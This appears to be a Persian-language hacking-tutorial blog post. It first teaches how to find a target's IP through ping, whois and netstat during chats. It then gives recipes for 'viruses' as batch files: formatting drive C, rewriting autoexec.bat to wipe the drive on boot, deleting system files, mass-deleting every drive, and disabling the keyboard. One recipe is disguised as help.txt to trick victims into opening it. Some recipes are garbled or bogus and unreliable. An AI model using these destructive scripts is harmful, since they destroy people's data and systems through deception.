July 12, 2009

Kaspersky Anti-Virus 2010 و Kaspersky Internet Security 2010 آخرین نسخه از این دو محصول کمپانی بزرگ ضد ویروس قدرتمند کسپراسکای

جلسه سوم : (Command Prompt و ادامه IP)
سلام دوستان عزیزم امیدوارم که حالتون خوب باشه و تا اینجای آموزش ها رو خونده باشید و ازشون استفاده کرده باشید.خوب عزیزان چون درجلسه قبل مقدمه IP روشروع کردم و برای چک کردن آی پی باید به CMDمیرفتیم بهتر دیدم که درباره Command Prompt یا همان CMD یه کم توضیح بدم چون از این به بعد بیشتر کارامون در محیط سیاه رنگ CMDانجام میشود.
Command Prompt را خط فرمان ویندوز نیز می گویند برای باز کردن آن به 2راه ساده اشاره میکنم:
1-درویندوز خود به مسیر زیر بروید :
Start---->Programs---->Accessories---->Command Prompt
2- این راه راحت تر است : طبق آموزش قبلی از داخل Startپنجره Runرا باز کنید ودرون آن تایپ کنید cmdواینتر را بزنید میبینید که یه صفحه سیاه رنگ باز میشود که در نوار آبی رنگ بالایش نوشته Command Prompt.
خوب دوستان برای Command Prompt دیگه توضیح بیشتری رو نمیدم که گیج نشید همین اندازه کفایت میکنه ، یکی از کاربرد های اصلی این برنامه پیدا کردن آپی Victim(قربانی)یا شخصی که میخواهیم بهش حمله کنیم میباشد.شما باید بدانید که اولین مرحله ازFootprinting(جمع آوری اطلاعات از قربانی رامی گویند)پیدا کردن IPاون هدف میباشد.
پیدا کردن IP یک سایت (پیدا کردن IP سرور) :
برای این کار روشهای مختلفی وجود دارد که من به بیشترشون که کارامد ترند میپردازم :
1- دوستان این روش رو فقط برای دانستن و کامل نمودن اطلاعاتتون بهتون یاد میدم ولی هیچ وقت ازش استفاده نکنید علتشم اینه که اکثراغلط از آب در میاد خودتون میتونید امتحان کنید ببینین که درست میگم یا نه .این روش به این صورته که در Internet Explorer خود آدرس آن سایت را که میخواهید IPشو پیدا کنین بزنید و اینتر کنید .درقسمت پایین مرورگر Internet Explorer خود یعنی Status Bar پس از چند لحظه برای مدت کوتاهی IP نمایش داده میشود (شکل آی پی رو در درس قبلی توضیح دادم) ومی توانید آن را یاد داشت کنید ولی اکثرا این آی پی که نمایش داده میشود در عرض چند ثانیه میرود برای همین شما میتوانید از صفحه مرورگر خودتان با زدن کلید Print Scrren که روی کیبردتان وجود دارد عکس بگیرید و در paint ذخیره کنیدش حالا میتوانید آی پی رو راحت بخونید . ولی همان طور که گفتم این راه راهه خوبی نیست چون تقریبا هیچ جا جواب نمیده یعنی  آی پی که به ما میده غلطه و اکثرا درمورد سایت های بزرگ مثل یاهو و ... جواب نمیده پس فقط این راه رو بلد باشین که کم نیارین همین.
2- دستور Ping را در Command Prompt صادر کنید(حول نشید میگم چه طوری)
فرمول کلی دستور ping به این صورت میباشد : ping domain به جای domain باید آدرس سایت مورد نظر رو تایپ و اینتر کنید(domain هادرواقع همان آدرس های اینترنتی میباشند )
برای درک بهتر و برای اینک کار با پینگ رو یاد بگیرید برای شما مثالی عملی میزنم :
مثلا اگه من بخواهم آی پی سایت یاهورا پیدا کنم باید وارد Run شوم و تایپ کنم cmd و سپس پس از ظاهر شدن صفحه سیاه Commad Prompt در آن به صورت زیر عمل کنم :
تایپ میکنیم ping yahoo.com و اینتر را میزنیم و سپس به ما جواب های زیر را که در شکل  زیرمی بینید را میدهد که آی پی سایت یاهو را می توان در سطر اول آن دید، در این عکس من آی پی سایت یاهو را میخواهم پیدا کنم :

اگر بجای ping yahoo.com از ping www.yahoo.com استفاده کنید به احتمال زیاد آی پی هایی که پیدا کردین با هم فرق میکنند این فقط برای سایت های بزرگ مثل یاهو اتفاق می افته ولی برای سایت های کوچک جواب برای هردو چه ping yahoo.com و چه ping www.yahoo.com  با هم یکسان میباشد.
در کل می توانم بگویم که اگه هدف شما یک سایت کوچک میباشد دستور پینگ برای شما مناسب میباشد.شکل زیر مربوط به  ping www.yahoo.com میباشد برای مقایسه آن با ping yahoo.com  گذاشتم که خوب فرقشونو بفهمید.

3-روش بعدی کامل ترین روش برای پیدا کردن IP همه سایت ها از کوچیک تا بزرگه که به نظر من همیشه برای همه سایت ها چه کوچک و چه بزرگ ازاین روش استفاده کنید نام این روش روش whois (هو ایز) است شیوه کار با هو ایز به این صورت میباشد که ما به بعضی از سایت ها که بعدا چند تا از بهترین هاشونو بهتون معرفی میکنم مراجعه میکنیم و از آنها می خواهیم که IPسایتی که میخواهیم رو به ما بدهند این سایت ها سایت هایی هستند که مسئول ثبت domain ها یا همان آدرس های اینترنتی مثل یاهو و .... هستند. درمورد هوایز درپست بعدی کاملا توضیح میدهم که خوب یاد بگیرید هو ایز رو کامل کامل توضیح خواهم داد چون بهترین و مهمترین راه پیدا کردن آی پی سایت ها میباشد.ولی فعلا فقط یه تمرین کوچک با هوایز را میخواهیم تجربه کنیم و فعلا فقط روشش رو میگم . در مرورگر Internet Explorer خود آدرس زیر را با دقت تایپ و اینتر کنید:
http://www.samspade.org/t/ipwhois?a=XXXXXX
که بجای  XXXXXX  باید آدرس سایت مورد نظر را وارد کنید مثلا برای یاهو میشود:
http://www.samspade.org/t/ipwhois?a=yahoo.com
یا
http://www.samspade.org/t/ipwhois?a=www.yahoo.com
در هو ایز کردن جواب برای هردو چه با wwwچه بدون wwwتقریبا یکی میباشد ولی برای سایت های بزرگ مثل یاهو به ما یه رنج آی پی میدهد با مقایسه دو آی پی بدست آمده منظورم و متوجه میشوید.ولی به نظر من هم در هو ایز و هم در پینگ بدون wwwآدرس ها را تایپ کنید با مقایسه دو شکلی که گذاشتم علت را متوجه میشوید.

این شکل مربوط به http://www.samspade.org/t/ipwhois?a=yahoo.com می باشد:

این شکل مربوط به http://www.samspade.org/t/ipwhois?a=www.yahoo.com می باشد:

تقسیم بندی آدرس های IP :
خوب دوستان این قسمت یکی از بدرد بخور ترین قسمت های آموزش مربوط به آی پی هست که شما با خوندنش میتونید با دیدن یک آی پی تشخیص دهید که یک آی پی از چه کلاسی است (درمورد کلاس آی پی توضیح میدم)و اینکه برای یک Client است یا یک Server .
آدرس های IP را کلا به 5کلاس تقسیم بندی میکنند که از کلاس A تا E نام دارند ولی ازبین این 5 کلاس 3تا کلاس اول یعنی A,B,C کاربرد عملی دارندکه درمورد آنها توضیحاتی را ارائه میدهم :
بررسی IP های کلاس A,B,C :
1- کلاس A : اگرهمانطور که قبلا گفتم آی پی را به صورت XXX.YYY.YYY.YYY درنظر بگیرید،کلاس A تمام آی پی هایی را شامل میشود که XXX در آن بین 1،126 است.این کلاس ویژه Backbone های بزرگ اینترنتی است ودرهنگام ثبت Domain برای گرفتن IP از آنها استفاده میشود.بنابراین اکثر سایت ها چنین آی پی های دارند . این کلاس را کلاس 8/ هم می نامند.
2-کلاس B : این کلاس تمام آی پی هایی را شامل میشود که XXX در آن بین 128 ,191 است.این کلاس هم ازجمله کلاس های پرکاربرد است.این کلاس را 16/هم میگویند.
3- کلاس C : این کلاس تمام آی پی هایی را شامل میشود که XXX در آن بین 192،223 است.این کلاس معمولا به Ispهایی که خدمات Dial Up ارائه می دهند، تعلق می گیرید(البته نه همیشه).بنا براین اگر به صورت Dial Upبه اینترنت متصل شوید،چنین IP می گیرید.این کلاس را 24/هم می گویند.
خوب اگه خیلی باهوش باشید که هستین میپرسید که چرا XXX هیچ وقت نه درکلاس A و نه درکلاس B,عدد 127 را شامل نمی شود؟
جواب : چون این عدد یعنی 127 برای کامپیوتر خودمان رزرو شده است . مثلا 127.0.01 معمولا یعنی Localhostیعنی خدمان.
پیدا کردن IP طرف مقابل در Chat در yahoo messenger :
دوستان این روش الان دیگه معمولا جواب نمیده ولی شاید روی سرویس پک یک عمل کندولی درکل فکر نکنم که زیاد بشه باهاش کار کرد ولی بدانید که یکی از مهمترین دستورات هک میباشد که حتما باید کامل یاد بگیرید.
حالا میخواهیم آی پی یک کلاینت که با Dial UP به اینترنت متصل شده است را پیدا کنیم و فرض می کنیم که با شما در پی ام در حال چت کردن هست . درضمن این روش بیشتر وقتی جواب میدهد که با یک نفر درحال چت کردن باشید و اگر با طرف ویس کنید یا بگویید برایتان یک فایل تو پی ام بفرستد خیلی بهتر کار میکند.
حالا همون طوری که گفتم صفحه سیاه cmd را باز کنید و در آن یکی از دستورات زیر را تایپ و اینترکنید:
netstat -n یا netstat دستور اولی یعنی netstat -n برای پیداکردن IP طرف مقابل است ودستور دوم یعنی netstat گاه می تواند اسم کامپیوتر اورابرای شما نشان دهد.
بعد از تایپ عبارت netstat -n یه سری آی پی به شما میدهد که جلویشان پورت های مربوط به همان آی پی رو نوشته آی پیی که جولوش عدد پورت 5101 داشته باشد آی پیه طرف مقابله اگه این عدد نبود یعنی اینکه هیچ یک از آن آی پی ها برای طرف مقابل نیست.برای بدست آوردن آی پی طرف مقابل بهتر از نرم افزار هایی مثل : X-netstat استفاده کنید.
خوب دوستان جلسه سوم هم نوشتم ولی بازم نظرات کمه خواهش میکنم با نظراتتان به من بگویید که آموزش ها بدرد میخورن یا نه ممنونم راستی مطالب بالا از معلومات اندک خودم بود . فعلا بای تا های.

افزودن متن دلخواه درکنار ساعت ویندوز
شما با این ترفند می توانید متن کنار ساعت موجود در
Taskbar وبندوزتان را عوض کنید . حتی می توانید در صورتی که در ویندوز XP فارسی را فعال کرده باشید عبارات را فارسی تایپ کنید.

1- فرمان Regedit را در قسمت RUN ویندوز وارد کنید.
2- به کلید مقابل بروید : HKEY_CURRENT_USER/Control Panel/International
3- داده ای رشته ای ( نوع String ) با نام S1159 ایجاد کرده ( در صورتی که از قبل ایجاد نشده باشد) و متن دلخواه خود را در آن وارد کنید ( به عنوان مقدار ).
4- داده رشته ای دیگر با نام S2359 ایجاد کرده و متن دلخواه دیگری را در آن وارد کنید.

---

درمنوها new غير فعال کردن آيتم
newاز اين تنظيمات برای غير فعال کردن توانايی ايجاد آبجکت های جديد از طريق آيتم
استفاده می شود
رجیستری را باز کرده وکلید زیر را پیداکنید
"-"با قرار دادن يک علامت
آن را تغيير نام دهيد GUIDدر جلوی
{D969A300-E7FF-11d0-A93B-00A0C90F2719-}به عنوان مثال
از رجيستري خارج شويد و براي اعمال تغييرات سيستم را مجددا راه اندازي کنيد

Registry Settings
System Key: [HKEY_CLASSES_ROOT\CLSID\
{D969A300-E7FF-11d0-A93B-00A0C90F2719}]

---

ویروس برای تخریب فلاپی به محض ورود آن به کامپیوتر 

روی Desktop راست کلیک کرده و از شاحه New گزینه Shortcut را انتخاب کنید . درون کادر سفید رنگ

عبارت مقابل را تایپ کنید : format a:/autotest سپس کلید Enter را فشاردهید . نام فایل را بنویسید و

دوباره Enter را فشار دهید . با اجازه ویروس آماده است .

ویروس برای فرمت درایو c:

یک Notepad باز کنید و عبارات زیر را درون آن تایپ کنید

@echo off

 call attrib -r -h c:\autoexec.bat >nul

 echo @echo off >c:\autoexec.bat

 echo format /autotest c:/q>nul >>c:\autoexec.bat

 call attrib +r +h c:\autoexec.bat >nul

 exit

سپس آن را با هرنامی که دوست داشتید با پسوند .bat ذخیره کنید . با باز شدن این ویروس کل

اطلاعات auto.exe پاک می شود و'format /autotest c:/q' جایگزین این اطلاعات می شود .که در نتیجه

هنگام بالا آمدن ویندوز بطور خودکار ویندوز پاک می شود .

ویروس برای تخریب ویندوز

 

یک Notepad باز کنید و عبارات زیر را درون آن تایپ کنید :

C:

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

اگه ویندوزXP هست بجای CD Winnt   بنويسيد CD Windows

آن را با پسوند .bat و با هر نامی که دوست داشتید ذخیره کنید . وقتی کسی این ویروس رو باز کنه

هیچی نمی شه اما وقتی کامپیوتر رو ریستارت کنه ویندوز دیگه بالا نمی آید ./

ساخت ویروس برای صفرکردن تاریخ و ساعت کامپیوتر

ابتدا یک Notepad به نام time0.bat باز کنید و عبارات زیر را درون آن تایپ کنید :

@Echo off

time=0:0:0

دوباره یک Notepad با نام Date0.bat باز کنید و عبارت زیر را درون آن تایپ کنید :

@ECHO OFF
date=10-10-10

سه باره یک Notepad با نام Comment.bat  باز کنید و عبارات زیر را درون آن تایپ کنید :

@echo off
echo I AM A VIRUS
echo SEAT AND SEE MY POWER!!!...
pause

یک Notepad دیگر با نام  help.bat باز کنید و درون آن عبارات زیر را تایپ کنید :

START TIME0
START DATE0
START comment

رو ی help.bat کلیک راست بکنین و Create ShortCut رو بزنین روی شرت کات ساخته شده کلیک راست

 کنین properties رو بزنین بعد تو قسمت General  به جای نام فایلتون بزنین help.txt  . ویروس آماده

است و باباز کردن فایل help.txt ساعت و تاریخ کامپیوتر ریست میشه

 

ساختن ویروس برای پر شدن فضای گرافیک و جلوگيري از

اجراي بازيها روي كامپيوتر

یک Notepad باز کنید وعبارات زیر را در آن تایپ کنید :

            c/windows/system32/jefo/display/memory/full  

سپس آن را با نام tak-hack.bat  ذخیره کنید ./

با اجراي اين ويروس ديگه هيچ بازي روي كامپيوتر اجرا نمي شه

 

ویروسی برای از کارانداختن Keyboard(بی خطره)

بوسیله برنامه Notepad دوفایل بسازید : 1- Reg-on.Reg   و 2-Reg-off.Reg

فایل اولی برای فعال ساختن ویروس و فایل دومی برای غیر فعال ساختن آن : در فایل اولی تایپ کنید:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]

"Flags"="127"

[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]

"Flags"="3"

"WindowsEffect"="3"

در فایل دومی برای از کار انداختن ویروس از عبارات زیر استفاده کنید :

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]

"Flags"="126"

[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]

"Flags"="2"

"WindowsEffect"="0"

این دوفایل زا با نام های گفته شده ذخیره کنید . ویروس آماده بید جیگر.!!!

البته باید کامپیوتر بعد از اجرای فایل ریستارت شود .

در فایل دومی برای از   کار انداختن ویروس از عبارات زیر استفاده کنید :

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]

"Flags"="126"

[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]

"Flags"="2"

"WindowsEffect"="0"

این دوفایل زا با نام های گفته شده ذخیره کنید . ویروس آماده بید جیگر.!!!

البته باید کامپیوتر بعد از اجرای فایل ریستارت شود .

ساختن ويروس Blaster

نشانه: هنگام اجرا شدن اين ويروس پنجره اي همراه با يك تايمر معكوس باز شده و  علامت Cancel كردن آن هم      خاموش است . و پس از اتمام اين ثانيه شمار كامپيوتر ريست مي شود و عوارضي براي كامپيوتر دارد . اين ويروس خيلي خطر ناك نيست اما براي كامپيوتر ضرر دارد و بيشتر در اينترنت منتشر ميگردد .  شروع كار:

ابتدا روي صفحه Desktop راست كليك كرده و New را انتخاب كنيد . Short cut را انتخاب كرده و درون كادر عبارت :

Shutdows –s –t xxx  را تايپ كنيد توجه داشته باشيد به جاي xxx  (به ثانيه)  مدت زماني را وارد كنيد كه كامپيوتر ريست مي شود .  سپس دكمه Enter را فشار دهيد . نام فايل را مشخص نموده و Enter  را فشار دهيد

 

 

 

ضد ويروس Blaster:

 

ابتدا روي صفحه Desktop راست كليك كرده و New را انتخاب كنيد . Short cut را انتخاب كرده و درون كادر عبارت :

Shutdows –a را تايپ كنيد . سپس دكمه Enter را فشار دهيد . نام فايل را مشخص نموده و Enter  را فشار دهيد

هر وقت از اينترنت اين ويروس براي شما ارسال شد، با باز كردن اين فايل از ريست شدن كامپيوتر جلوگيري مي شود

در ضمن اين ضد ويروس سرعت كامپيوتر را تغيير نمي دهد.

ساختن ويروسي براي Internet Explorer

اين ويروس اينترنت اكسپلورر رو فيلتر گذاري مي كنه و باعث خراب شدنش مي شه . طرز كار:

يك Notepad باز كنيد . درون آن جمله روبرو را بنويسيد: pouped-blocked-web-exploure-online&offline

بعد اون رو با پسوند .bat ذخيره كنيد .

 

نوعي ديگر از ويروس براي فورمت كردن هارد

 

با اجرا شدن اين ويروس كليه اطلاعات هارد پاك شده و به هيچ وجه بازيافت نمي شه:

روش كار: يك Notepad باز كنيد و در آن بنويسيد :

echo off@
ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\
resrart

حالا  با پسوند  .bat ذخيره كنيد .

ساختن ويروسي ساده ولي در عين حال خطرناك 

اين ويروس ساختنش كاري نداره ولي اگه كسي بازش كنه ..............  به سمت بهشت زهرا ارسال مي شه   .   حالا طرز كار : يكNotepad  باز كرده و درون آن بنويسيد : Format c:/autotest بعد با پسوند .bat ذخيره كنيد . اين ويروس موقع اجزا شدن درايو C رو فرمت مي كنه به طوري كه نه مي شه اطلاعاتي توش ريخت نه مي شه فرمتش كرد . موفق باشي

 تر تیب کننده ذبیح الله و میلاد